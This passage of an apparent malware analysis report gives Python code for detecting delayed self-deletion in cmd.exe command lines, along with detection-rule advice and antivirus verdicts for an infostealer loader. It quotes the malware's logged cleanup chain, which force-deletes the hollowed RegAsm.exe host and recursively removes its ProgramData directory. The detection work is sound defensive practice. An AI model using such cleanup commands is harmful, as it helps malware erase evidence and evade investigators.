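    """Drop the leading cmd.exe /c, then split on '&' outside double quotes."""
    body = CMD_PREFIX_RE.sub("", command_line, count=1)
    parts, cur, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]  # '&&' leaves an empty part; drop it


def _norm(path: str) -> str:
    return path.replace("/", "\\").casefold()


def analyze_cleanup(command_line: str, parent_image: str) -> dict:
    delay: Optional[int] = None
    deleted: List[str] = []
    removed_dirs: List[str] = []
    for part in split_chain(command_line):
        m = TIMEOUT_RE.match(part) or PING_RE.match(part)
        if m:
            delay = int(m.group(1))
            continue
        m = DEL_RE.match(part)
        if m:
            deleted.append(m.group(1))
            continue
        m = RD_RE.match(part)
        if m:
            removed_dirs.append(m.group(1))
    return {
        "delay_seconds": delay,
        "deleted": deleted,
        "removed_dirs": removed_dirs,
        "self_delete": any(_norm(p) == _norm(parent_image) for p in deleted),
        # a delay followed by a delete is the routine even when the target is not the parent
        "delayed_delete": delay is not None and bool(deleted),
    }


# Command line as logged in this report; the parent image is the hollowed host.
HOST_IMAGE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_CMDLINE = (r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q '
                  r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & '
                  r'rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit')
# Constructed control: a delayed delete of a log file by a build tool.
BENIGN_CMDLINE = r"cmd.exe /c timeout /t 5 & del C:\Temp\build.log"

if __name__ == "__main__":
    print(analyze_cleanup(SAMPLE_CMDLINE, HOST_IMAGE))
    print(analyze_cleanup(BENIGN_CMDLINE, r"C:\Tools\build.exe"))
```

In a detection rule, require both `delayed_delete` and either `self_delete` or a deleted path under a user-writable drop location, and alert separately on `rd /s /q` against a freshly created ProgramData directory; the random-looking name here (AEHIJDAFBKFH) is the loader's working directory.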
Bkav W32.AIDetectMalware.CS
Skyhigh Artemis!Trojan
ALYac Gen:Variant.MSILHeracles.179854
Cylance Unsafe
VIPRE Gen:Variant.MSILHeracles.179854
Sangfor Infostealer.Msil.Kryptik.Vivn
CrowdStrike win/malicious_confidence_70% (D)
BitDefender Gen:Variant.Zusy.561455
Arcabit Trojan.MSILHeracles.D2BE8E
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/GenKryptik.HBHS
APEX Malicious
Avast Win32:PWSX-gen [Trj]
ClamAV Win.Packed.Msilheracles-10036160-0
Kaspersky HEUR:Trojan-Spy.MSIL.Stealer.gen
Alibaba TrojanSpy:MSIL/Stealer.80225857
MicroWorld-eScan Gen:Variant.Zusy.561455
Rising Stealer.Agent!8.C2 (CLOUD)
Emsisoft Gen:Variant.Zusy.561455 (B)
F-Secure Trojan.TR/AD.Nekark.arxip
TrendMicro Trojan.Win32.PRIVATELOADER.YXEIPZ
McAfeeD ti!D574DE9B5D8F
CTX exe.trojan.msil
Sophos Mal/Generic-S
FireEye Generic.mg.458d31ecc5a490d5
Webroot W32.Trojan.Gen
Google Detected
Avira TR/AD.Nekark.arxip
Kingsoft MSIL.Trojan-Spy.Stealer.gen
Gridinsoft Spy.Win32.Vidar.tr
Microsoft Trojan:MSIL/Cerbu.AMA!MTB
ZoneAlarm HEUR:Trojan-Spy.MSIL.Stealer.gen
GData Win32.Trojan.Kryptik.T7AR2T
Varist W32/MSIL_Kryptik.LNK.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5670639
McAfee Artemis!458D31ECC5A4
DeepInstinct MALICIOUS
Ikarus Trojan-Spy.LummaStealer
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXEIPZ
Tencent Win32.Trojan.FalseSign.Vimw
huorong Trojan/MSIL.Agent.li
Fortinet MSIL/Kryptik.AMFU!tr
AVG Win32:PWSX-gen [Trj]
Paloalto generic.ml
alibabacloud Trojan[spy]:MSIL/Wacapew.C9nj